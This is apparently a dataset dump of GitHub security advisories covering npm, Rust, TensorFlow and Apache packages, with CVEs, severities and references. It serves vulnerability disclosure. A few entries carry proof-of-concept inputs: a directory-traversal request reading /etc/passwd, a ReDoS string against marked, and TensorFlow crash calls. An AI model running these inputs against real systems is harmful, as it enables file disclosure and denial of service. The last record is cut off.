ecosystem
stringclasses 14
values | vuln_id
stringlengths 10
19
| summary
stringlengths 4
267
⌀ | details
stringlengths 9
13.5k
| aliases
stringlengths 17
144
⌀ | modified_date
stringdate 2010-05-27 05:47:00
2022-05-10 08:46:52
| published_date
stringdate 2005-12-31 05:00:00
2022-05-10 08:46:50
| severity
stringclasses 5
values | score
float64 0
10
⌀ | cwe_id
stringclasses 988
values | refs
stringlengths 30
17.7k
⌀ | introduced
stringlengths 75
4.26k
⌀ |
|---|---|---|---|---|---|---|---|---|---|---|---|
GHSA
|
GHSA-8fr3-hfg3-gpgp
|
Open Redirect in node-forge
|
parseUrl functionality in node-forge mishandles certain uses of backslash such as https:/\/\/\ and interprets the URI as a relative path.
|
{'CVE-2022-0122'}
|
2022-01-21T23:36:19Z
|
2022-01-21T23:36:19Z
|
MODERATE
| 0
|
{'CWE-601'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2022-0122', 'https://huntr.dev/bounties/41852c50-3c6d-4703-8c55-4db27164a4ae', 'https://github.com/digitalbazaar/forge/commit/db8016c805371e72b06d8e2edfe0ace0df934a5e', 'https://github.com/advisories/GHSA-8fr3-hfg3-gpgp'}
| null |
GHSA
|
GHSA-w5r2-gvgf-mpm8
|
Improper Encoding or Escaping of Output and Injection in LibreNMS
|
An issue was discovered in LibreNMS 1.50.1. The scripts that handle graphing options (includes/html/graphs/common.inc.php and includes/html/graphs/graphs.inc.php) do not sufficiently validate or encode several fields of user supplied input. Some parameters are filtered with mysqli_real_escape_string, which is only useful for preventing SQL injection attacks; other parameters are unfiltered. This allows an attacker to inject RRDtool syntax with newline characters via the html/graph.php and html/graph-realtime.php scripts. RRDtool syntax is quite versatile and an attacker could leverage this to perform a number of attacks, including disclosing directory structure and filenames, disclosing file content, denial of service, or writing arbitrary files. NOTE, relative to CVE-2019-10665, this requires authentication and the pathnames differ.
|
{'CVE-2019-12463'}
|
2021-05-11T14:41:55Z
|
2019-10-11T18:43:13Z
|
HIGH
| 8.8
|
{'CWE-116', 'CWE-74'}
|
{'https://github.com/advisories/GHSA-w5r2-gvgf-mpm8', 'https://www.darkmatter.ae/xen1thlabs/librenms-rrdtool-injection-vulnerability-xl-19-022/', 'https://nvd.nist.gov/vuln/detail/CVE-2019-12463'}
| null |
GHSA
|
GHSA-mgff-xpg3-3gwc
|
Malicious Package in bsae-x
|
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-10-01T20:57:02Z
|
2020-09-03T19:42:25Z
|
CRITICAL
| 9.1
|
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1380', 'https://github.com/advisories/GHSA-mgff-xpg3-3gwc'}
| null |
GHSA
|
GHSA-r683-j2x4-v87g
|
node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor
|
node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor
|
{'CVE-2022-0235'}
|
2022-04-19T19:03:26Z
|
2022-01-21T23:55:52Z
|
HIGH
| 8.8
|
{'CWE-200', 'CWE-173', 'CWE-601'}
|
{'https://github.com/node-fetch/node-fetch/commit/36e47e8a6406185921e4985dcbeff140d73eaa10', 'https://github.com/node-fetch/node-fetch/pull/1453', 'https://huntr.dev/bounties/d26ab655-38d6-48b3-be15-f9ad6b6ae6f7', 'https://github.com/advisories/GHSA-r683-j2x4-v87g', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0235', 'https://github.com/node-fetch/node-fetch/commit/5c32f002fdd65b1c6a8f1e3620210813d45c7e60'}
| null |
GHSA
|
GHSA-2jhh-5xm2-j4gf
|
Improper Authentication in HashiCorp Nomad
|
HashiCorp Nomad and Nomad Enterprise up to 1.0.13, 1.1.7, and 1.2.0, with the QEMU task driver enabled, allowed authenticated users with job submission capabilities to bypass the configured allowed image paths. Fixed in 1.0.14, 1.1.8, and 1.2.1.
|
{'CVE-2021-43415'}
|
2021-12-10T20:17:55Z
|
2021-12-10T20:17:55Z
|
HIGH
| 8.8
|
{'CWE-287'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-43415', 'https://www.hashicorp.com/blog/category/nomad', 'https://discuss.hashicorp.com/t/hcsec-2021-31-nomad-qemu-task-driver-allowed-paths-bypass-with-job-args/32288', 'https://github.com/advisories/GHSA-2jhh-5xm2-j4gf'}
| null |
GHSA
|
GHSA-32j9-6qqm-mq9g
|
Unhandled case in node-lmdb
|
The package node-lmdb before 0.9.7 is vulnerable to Denial of Service (DoS) when defining a non-invokable `ToString` value, which will cause a crash during type check.
|
{'CVE-2022-21164'}
|
2022-03-30T20:16:16Z
|
2022-03-17T00:00:27Z
|
HIGH
| 7.5
|
{'CWE-241', 'CWE-703'}
|
{'https://snyk.io/vuln/SNYK-JS-NODELMDB-2400723', 'https://github.com/Venemo/node-lmdb/commit/97760104c0fd311206b88aecd91fa1f59fe2b85a', 'https://github.com/advisories/GHSA-32j9-6qqm-mq9g', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21164'}
| null |
GHSA
|
GHSA-x5m6-jh4r-34mv
|
Arbitrary File Overwrite in hub
|
The am function in lib/hub/commands.rb in hub before 1.12.1 allows local users to overwrite arbitrary files via a symlink attack on a temporary patch file.
|
{'CVE-2014-0177'}
|
2022-02-15T01:07:53Z
|
2022-02-15T01:07:53Z
|
MODERATE
| 4.4
|
{'CWE-377'}
|
{'https://secunia.com/advisories/58273', 'https://github.com/github/hub/commit/016ec99d25b1cb83cb4367e541177aa431beb600', 'https://nvd.nist.gov/vuln/detail/CVE-2014-0177', 'https://github.com/advisories/GHSA-x5m6-jh4r-34mv'}
| null |
GHSA
|
GHSA-j7cg-h9v9-6vqp
|
"Prototype Pollution in irrelon-path and @irrelon/path"
|
The package irrelon-path before 4.7.0; the package @irrelon/path before 4.7.0 are vulnerable to Prototype Pollution via the set, unSet, pushVal and pullVal functions.
|
{'CVE-2020-7708'}
|
2021-07-29T21:55:56Z
|
2021-05-06T17:29:19Z
|
CRITICAL
| 9.8
|
{'CWE-915'}
|
{'https://github.com/advisories/GHSA-j7cg-h9v9-6vqp', 'https://snyk.io/vuln/SNYK-JS-IRRELONPATH-598672', 'https://github.com/Irrelon/irrelon-path/commit/8a126b160c1a854ae511659c111413ad9910ebe3', 'https://snyk.io/vuln/SNYK-JS-IRRELONPATH-598673', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7708'}
| null |
GHSA
|
GHSA-6v6p-p97v-g2p7
|
Out-of-bounds Write in OpenCV
|
OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python and OpenCV-Contrib-Python 3.3.0.9) has an invalid write in the cv::RLByteStream::getBytes function in modules/imgcodecs/src/bitstrm.cpp when reading an image file by using cv::imread, as demonstrated by the 2-opencv-heapoverflow-fseek test case.
|
{'CVE-2017-12603'}
|
2021-11-18T15:32:37Z
|
2021-10-12T22:01:44Z
|
HIGH
| 8.8
|
{'CWE-787'}
|
{'https://github.com/advisories/GHSA-6v6p-p97v-g2p7', 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12603', 'https://github.com/opencv/opencv/pull/9376', 'https://security.gentoo.org/glsa/201712-02', 'https://github.com/opencv/opencv/issues/9309', 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html', 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}
| null |
GHSA
|
GHSA-gxcm-36qw-j29v
|
SQL Injection in tribalsystems/zenario
|
SQL Injection in the "admin_boxes.ajax.php" component of Tribal Systems Zenario CMS v8.8.52729 allows remote attackers to obtain sesnitive database information by injecting SQL commands into the "cID" parameter when creating a new HTML component.
|
{'CVE-2021-27672'}
|
2021-06-08T20:12:02Z
|
2021-06-08T20:12:02Z
|
MODERATE
| 4.9
|
{'CWE-89'}
|
{'https://deadsh0t.medium.com/blind-error-based-authenticated-sql-injection-on-zenario-8-8-52729-cms-d4705534df38', 'https://github.com/TribalSystems/Zenario/commit/2c82a4d126c8446106347ef603b157f2d4175fd1', 'https://github.com/advisories/GHSA-gxcm-36qw-j29v', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27672', 'https://github.com/TribalSystems/Zenario/releases/tag/8.8.53370'}
| null |
GHSA
|
GHSA-7rg2-qxmf-hhx9
|
Session fixation in express-openid-connect
|
### Overview
Versions `2.3.0` up to and including `2.5.1` do not regenerate the session id and session cookie when user logs in. This behavior opens up the application to various session fixation vulnerabilities.
### Am I affected?
You are affected by this vulnerability if you are using `express-openid-connect` version `2.3.0` up to and including `2.5.1` and use a custom session store.
### How to fix that?
Upgrade to version `>= 2.5.2`.
### Will this update impact my users?
The fix provided in patch will not affect your users.
|
{'CVE-2021-41246'}
|
2021-12-15T15:28:49Z
|
2021-12-09T19:08:58Z
|
MODERATE
| 4.6
|
{'CWE-384'}
|
{'https://github.com/auth0/express-openid-connect/releases/tag/v2.5.2', 'https://github.com/auth0/express-openid-connect/security/advisories/GHSA-7rg2-qxmf-hhx9', 'https://github.com/advisories/GHSA-7rg2-qxmf-hhx9', 'https://github.com/auth0/express-openid-connect/commit/5ab67ff2bd84f76674066b5e129b43ab5f2f430f', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41246'}
| null |
GHSA
|
GHSA-xrqm-fpgr-6hhx
|
Overflow/crash in `tf.range`
|
### Impact
While calculating the size of the output within the `tf.range` kernel, there is a conditional statement of type `int64 = condition ? int64 : double`. Due to C++ implicit conversion rules, both branches of the condition will be cast to `double` and the result would be truncated before the assignment. This result in overflows:
```python
import tensorflow as tf
tf.sparse.eye(num_rows=9223372036854775807, num_columns=None)
```
Similarly, `tf.range` would result in crashes due to overflows if the start or end point are too large.
```python
import tensorflow as tf
tf.range(start=-1e+38, limit=1)
```
### Patches
We have patched the issue in GitHub commits [6d94002a09711d297dbba90390d5482b76113899](https://github.com/tensorflow/tensorflow/commit/6d94002a09711d297dbba90390d5482b76113899) (merging [#51359](https://github.com/tensorflow/tensorflow/pull/51359)) and [1b0e0ec27e7895b9985076eab32445026ae5ca94](https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94) (merging [#51711](https://github.com/tensorflow/tensorflow/pull/51711)).
The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported externally via [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46912), [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46899) and [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46889).
|
{'CVE-2021-41202'}
|
2021-11-10T19:13:16Z
|
2021-11-10T19:13:16Z
|
MODERATE
| 5.5
|
{'CWE-681'}
|
{'https://github.com/tensorflow/tensorflow/issues/46889', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41202', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xrqm-fpgr-6hhx', 'https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94', 'https://github.com/tensorflow/tensorflow/issues/46912', 'https://github.com/tensorflow/tensorflow/commit/6d94002a09711d297dbba90390d5482b76113899', 'https://github.com/advisories/GHSA-xrqm-fpgr-6hhx'}
| null |
GHSA
|
GHSA-5v2h-r2cx-5xgj
|
Inefficient Regular Expression Complexity in marked
|
### Impact
_What kind of vulnerability is it?_
Denial of service.
The regular expression `inline.reflinkSearch` may cause catastrophic backtracking against some strings.
PoC is the following.
```javascript
import * as marked from 'marked';
console.log(marked.parse(`[x]: x
\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](`));
```
_Who is impacted?_
Anyone who runs untrusted markdown through marked and does not use a worker with a time limit.
### Patches
_Has the problem been patched?_
Yes
_What versions should users upgrade to?_
4.0.10
### Workarounds
_Is there a way for users to fix or remediate the vulnerability without upgrading?_
Do not run untrusted markdown through marked or run marked on a [worker](https://marked.js.org/using_advanced#workers) thread and set a reasonable time limit to prevent draining resources.
### References
_Are there any links users can visit to find out more?_
- https://marked.js.org/using_advanced#workers
- https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [marked](https://github.com/markedjs/marked)
|
{'CVE-2022-21681'}
|
2022-04-19T19:03:20Z
|
2022-01-14T21:04:46Z
|
HIGH
| 7.5
|
{'CWE-1333'}
|
{'https://github.com/markedjs/marked/security/advisories/GHSA-5v2h-r2cx-5xgj', 'https://github.com/advisories/GHSA-5v2h-r2cx-5xgj', 'https://github.com/markedjs/marked/commit/8f806573a3f6c6b7a39b8cdb66ab5ebb8d55a5f5', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21681'}
| null |
GHSA
|
GHSA-3wxq-7r8m-qpmg
|
Hijacked Environment Variables in ffmepg
|
The `ffmepg` package is a piece of malware that steals environment variables and sends them to attacker controlled locations.
All versions have been unpublished from the npm registry.
## Recommendation
As this package is malware, if you find it installed in your environment, the real security concern is determining how it got there.
If you have found this installed in your environment, you should:
1. Delete the package
2. Clear your npm cache
3. Ensure it is not present in any other package.json files on your system
4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables.
Additionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.
|
{'CVE-2017-16068'}
|
2021-01-08T19:58:20Z
|
2018-08-29T23:56:30Z
|
MODERATE
| 0
|
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/507', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16068', 'https://nodesecurity.io/advisories/507', 'https://github.com/advisories/GHSA-3wxq-7r8m-qpmg'}
| null |
GHSA
|
GHSA-c7hr-j4mj-j2w6
|
Verification Bypass in jsonwebtoken
|
Versions 4.2.1 and earlier of `jsonwebtoken` are affected by a verification bypass vulnerability. This is a result of weak validation of the JWT algorithm type, occuring when an attacker is allowed to arbitrarily specify the JWT algorithm.
## Recommendation
Update to version 4.2.2 or later.
|
{'CVE-2015-9235'}
|
2021-01-08T19:00:39Z
|
2018-10-09T00:38:30Z
|
CRITICAL
| 0
|
{'CWE-20'}
|
{'https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/', 'https://www.timmclean.net/2015/02/25/jwt-alg-none.html', 'https://nvd.nist.gov/vuln/detail/CVE-2015-9235', 'https://github.com/advisories/GHSA-c7hr-j4mj-j2w6', 'https://www.npmjs.com/advisories/17', 'https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687', 'https://nodesecurity.io/advisories/17'}
| null |
GHSA
|
GHSA-f5mh-hq6h-whxv
|
Directory Traversal in bitty
|
Affected versions of `bitty` are vulnerable to directory traversal via the URL path in GET requests.
## Recommendation
The `bitty` package is not currently maintained, and has not seen an update since 2015.
At this time, the best available mitigation is to use an alternative module that is actively maintained and provides similar functionality, such as [serve](https://www.npmjs.com/package/serve).
|
{'CVE-2016-10561'}
|
2021-01-08T21:04:47Z
|
2019-02-18T23:38:29Z
|
MODERATE
| 0
|
{'CWE-22'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10561', 'https://nodesecurity.io/advisories/150', 'https://github.com/advisories/GHSA-f5mh-hq6h-whxv', 'https://www.npmjs.com/advisories/150'}
| null |
GHSA
|
GHSA-92cx-4xm7-jr9m
|
Use After Free in rusqlite
|
An issue was discovered in the rusqlite crate 0.25.x before 0.25.4 and 0.26.x before 0.26.2 for Rust. create_scalar_function has a use-after-free.
|
{'CVE-2021-45713'}
|
2022-01-07T16:09:59Z
|
2022-01-06T22:02:56Z
|
HIGH
| 7.5
|
{'CWE-416'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-45713', 'https://github.com/advisories/GHSA-92cx-4xm7-jr9m', 'https://rustsec.org/advisories/RUSTSEC-2021-0128.html', 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/rusqlite/RUSTSEC-2021-0128.md'}
| null |
GHSA
|
GHSA-h9rv-jmmf-4pgx
|
Cross-Site Scripting in serialize-javascript
|
Versions of `serialize-javascript` prior to 2.1.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize serialized regular expressions. This vulnerability does not affect Node.js applications.
## Recommendation
Upgrade to version 2.1.1 or later.
|
{'CVE-2019-16769'}
|
2021-01-08T18:42:23Z
|
2019-12-05T18:44:37Z
|
MODERATE
| 4.2
|
{'CWE-79'}
|
{'https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-h9rv-jmmf-4pgx', 'https://www.npmjs.com/advisories/1426', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16769', 'https://github.com/advisories/GHSA-h9rv-jmmf-4pgx'}
| null |
GHSA
|
GHSA-39xg-8p43-h76x
|
Data races in reffers
|
An issue was discovered in the reffers crate through 2020-12-01 for Rust. ARefss can contain a !Send,!Sync object, leading to a data race and memory corruption.
|
{'CVE-2020-36203'}
|
2021-08-25T20:51:40Z
|
2021-08-25T20:51:40Z
|
MODERATE
| 4.7
|
{'CWE-362', 'CWE-787'}
|
{'https://rustsec.org/advisories/RUSTSEC-2020-0094.html', 'https://github.com/diwic/reffers-rs/issues/7', 'https://github.com/advisories/GHSA-39xg-8p43-h76x', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36203'}
| null |
GHSA
|
GHSA-f8fh-8rgm-227h
|
OS Command Injection in node-prompt-here
|
node-prompt-here through 1.0.1 allows execution of arbitrary commands. The "runCommand()" is called by "getDevices()" function in file "linux/manager.js", which is required by the "index. process.env.NM_CLI" in the file "linux/manager.js". This function is used to construct the argument of function "execSync()", which can be controlled by users without any sanitization.
|
{'CVE-2020-7602'}
|
2021-07-28T20:46:04Z
|
2021-05-07T16:16:16Z
|
CRITICAL
| 9.8
|
{'CWE-78'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-7602', 'https://github.com/advisories/GHSA-f8fh-8rgm-227h', 'https://snyk.io/vuln/SNYK-JS-NODEPROMPTHERE-560115'}
| null |
GHSA
|
GHSA-2mh8-gx2m-mr75
|
Out-of-Memory Error in Bouncy Castle Crypto
|
The ASN.1 parser in Bouncy Castle Crypto (aka BC Java) 1.63 can trigger a large attempted memory allocation, and resultant OutOfMemoryError error, via crafted ASN.1 data. This is fixed in 1.64.
|
{'CVE-2019-17359'}
|
2021-01-22T17:43:10Z
|
2019-10-17T18:15:16Z
|
MODERATE
| 0
|
{'CWE-770'}
|
{'https://lists.apache.org/thread.html/r02f887807a49cfd1f1ad53f7a61f3f8e12f60ba2c930bec163031209@%3Ccommits.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r8ecb5b76347f84b6e3c693f980dbbead88c25f77b815053c4e6f2c30@%3Ccommits.tomee.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://lists.apache.org/thread.html/r467ade3fef3493f1fff1a68a256d087874e1f858ad1de7a49fe05d27@%3Ccommits.tomee.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://www.bouncycastle.org/releasenotes.html', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://www.bouncycastle.org/latest_releases.html', 'https://lists.apache.org/thread.html/r79b6a6aa0dd1aeb57bd253d94794bc96f1ec005953c4bd5414cc0db0@%3Ccommits.tomee.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://github.com/advisories/GHSA-2mh8-gx2m-mr75', 'https://nvd.nist.gov/vuln/detail/CVE-2019-17359', 'https://lists.apache.org/thread.html/r91b07985b1307390a58c5b9707f0b28ef8e9c9e1c86670459f20d601@%3Ccommits.tomee.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20191024-0006/', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'https://lists.apache.org/thread.html/r16c3a90cb35ae8a9c74fd5c813c16d6ac255709c9f9d71cd409e007d@%3Ccommits.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r4d475dcaf4f57115fa57d8e06c3823ca398b35468429e7946ebaefdc@%3Ccommits.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/re60f980c092ada4bfe236dcfef8b6ca3e8f3b150fc0f51b8cc13d59d@%3Ccommits.tomee.apache.org%3E'}
| null |
GHSA
|
GHSA-xjqr-g762-pxwp
|
Improper limitation of path name
|
An improper limitation of path name flaw was found in containernetworking/cni in versions before 0.8.1. When specifying the plugin to load in the 'type' field in the network configuration, it is possible to use special elements such as "../" separators to reference binaries elsewhere on the system. This flaw allows an attacker to execute other existing binaries other than the cni plugins/types, such as 'reboot'. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
|
{'CVE-2021-20206'}
|
2022-04-12T22:49:04Z
|
2022-02-15T01:57:18Z
|
HIGH
| 7.2
|
{'CWE-20', 'CWE-22'}
|
{'https://github.com/containernetworking/cni/pull/808', 'https://nvd.nist.gov/vuln/detail/CVE-2021-20206', 'https://github.com/advisories/GHSA-xjqr-g762-pxwp', 'https://bugzilla.redhat.com/show_bug.cgi?id=1919391', 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMCONTAINERNETWORKINGCNIPKGINVOKE-1070549'}
| null |
GHSA
|
GHSA-836g-5fr5-fgcr
|
Missing Authentication for Critical Function in Apache TomEE
|
If Apache TomEE is configured to use the embedded ActiveMQ broker, and the broker URI includes the useJMX=true parameter, a JMX port is opened on TCP port 1099, which does not include authentication. This affects Apache TomEE 8.0.0-M1 - 8.0.1, Apache TomEE 7.1.0 - 7.1.2, Apache TomEE 7.0.0-M1 - 7.0.7, Apache TomEE 1.0.0 - 1.7.5.
|
{'CVE-2020-11969'}
|
2022-02-10T23:07:37Z
|
2022-02-10T23:07:37Z
|
HIGH
| 9.8
|
{'CWE-306'}
|
{'https://lists.apache.org/thread.html/ref088c4732e1a8dd0bbbb96e13ffafcfe65f984238ffa55f438d78fe@%3Cdev.tomee.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2020/12/16/2', 'https://lists.apache.org/thread.html/rbd23418646dedda70a546331ea1c1d115b8975b7e7dc452d10e2e773@%3Cannounce.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-11969', 'https://lists.apache.org/thread.html/ref088c4732e1a8dd0bbbb96e13ffafcfe65f984238ffa55f438d78fe@%3Cusers.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r85b87478f8aa4751aa3a06e88622e80ffabae376ee7283e147ee56b9@%3Cdev.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/rbd23418646dedda70a546331ea1c1d115b8975b7e7dc452d10e2e773%40%3Cdev.tomee.apache.org%3E', 'https://github.com/advisories/GHSA-836g-5fr5-fgcr'}
| null |
GHSA
|
GHSA-fg3j-q579-v8x4
|
Uncontrolled memory consumption
|
In Apache PDFBox, a carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.
|
{'CVE-2021-31811'}
|
2022-04-22T15:48:15Z
|
2021-06-15T15:54:32Z
|
MODERATE
| 5.5
|
{'CWE-789', 'CWE-770'}
|
{'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31811', 'https://lists.apache.org/thread.html/r2090789e4dcc2c87aacbd87d5f18e2d64dcb9f6eb7c47f5cf7d293cb@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/re3bd16f0cc8f1fbda46b06a4b8241cd417f71402809baa81548fc20e%40%3Cusers.pdfbox.apache.org%3E', 'https://lists.apache.org/thread.html/rf937c2236e6c79cdb99f76a70690dd345e53dbe0707cb506a202e43e@%3Cannounce.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2021/06/12/2', 'https://lists.apache.org/thread.html/r179cc3b6822c167702ab35fe36093d5da4c99af44238c8a754c6860f@%3Ccommits.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/r143fd8445e0e778f4a85187bd79438630b96b8040e9401751fdb8aea@%3Ccommits.ofbiz.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://lists.apache.org/thread.html/rd4b6db6c3b8ab3c70f1c3bbd725a40920896453ffc2744ade6afd9fb@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/re3bd16f0cc8f1fbda46b06a4b8241cd417f71402809baa81548fc20e@%3Cusers.pdfbox.apache.org%3E', 'https://github.com/advisories/GHSA-fg3j-q579-v8x4', 'https://lists.apache.org/thread.html/r132e9dbbe0ebdc08b39583d8be0a575fdba573d60a42d940228bceff@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MDJKJQOMVFDFIDS27OQJXNOYHV2O273D/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7HHWJRFXZ3PTKLJCOM7WJEYZFKFWMNSV/', 'https://lists.apache.org/thread.html/re0cacd3fb337cdf8469853913ed2b4ddd8f8bfc52ff0ddbe61c1dfba@%3Ccommits.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/rfe26bcaba564deb505c32711ba68df7ec589797dcd96ff3389a8aaba@%3Cnotifications.ofbiz.apache.org%3E', 'https://www.oracle.com//security-alerts/cpujul2021.html'}
| null |
GHSA
|
GHSA-24p5-x9f9-vvpx
|
Cross-site Scripting in baserCMS
|
Improper neutralization of JavaScript input in the page editing function of baserCMS versions prior to 4.4.5 allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.
|
{'CVE-2021-20681'}
|
2021-06-08T20:10:27Z
|
2021-06-08T20:10:27Z
|
MODERATE
| 5.4
|
{'CWE-79'}
|
{'https://github.com/baserproject/basercms', 'https://github.com/advisories/GHSA-24p5-x9f9-vvpx', 'https://jvn.jp/en/jp/JVN64869876/index.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-20681', 'https://basercms.net/security/JVN64869876', 'https://packagist.org/packages/baserproject/basercms'}
| null |
GHSA
|
GHSA-xqfm-ff6g-24c7
|
Directory Traversal in dgard8.lab6
|
Affected versions of `dgard8.lab6` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16218'}
|
2021-01-08T20:55:55Z
|
2018-07-23T20:39:44Z
|
HIGH
| 0
|
{'CWE-22'}
|
{'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/dgard8.lab6', 'https://github.com/advisories/GHSA-xqfm-ff6g-24c7', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16218', 'https://www.npmjs.com/advisories/444', 'https://nodesecurity.io/advisories/444'}
| null |
GHSA
|
GHSA-62gx-355r-9fhg
|
Session operations in eager mode lead to null pointer dereferences
|
### Impact
In eager mode (default in TF 2.0 and later), session operations are invalid. However, users could still call the raw ops associated with them and trigger a null pointer dereference:
```python
import tensorflow as tf
tf.raw_ops.GetSessionTensor(handle=['\x12\x1a\x07'],dtype=4)
```
```python
import tensorflow as tf
tf.raw_ops.DeleteSessionTensor(handle=['\x12\x1a\x07'])
```
The [implementation](https://github.com/tensorflow/tensorflow/blob/eebb96c2830d48597d055d247c0e9aebaea94cd5/tensorflow/core/kernels/session_ops.cc#L104) dereferences the session state pointer without checking if it is valid:
```cc
OP_REQUIRES_OK(ctx, ctx->session_state()->GetTensor(name, &val));
```
Thus, in eager mode, `ctx->session_state()` is nullptr and the call of the member function is undefined behavior.
### Patches
We have patched the issue in GitHub commit [ff70c47a396ef1e3cb73c90513da4f5cb71bebba](https://github.com/tensorflow/tensorflow/commit/ff70c47a396ef1e3cb73c90513da4f5cb71bebba).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
|
{'CVE-2021-29518'}
|
2021-05-21T14:21:05Z
|
2021-05-21T14:21:05Z
|
LOW
| 2.5
|
{'CWE-476'}
|
{'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-62gx-355r-9fhg', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29518', 'https://github.com/advisories/GHSA-62gx-355r-9fhg', 'https://github.com/tensorflow/tensorflow/commit/ff70c47a396ef1e3cb73c90513da4f5cb71bebba'}
| null |
GHSA
|
GHSA-8xxm-h73r-ghfj
|
Validation bypass in frourio
|
## 日本語
### 影響
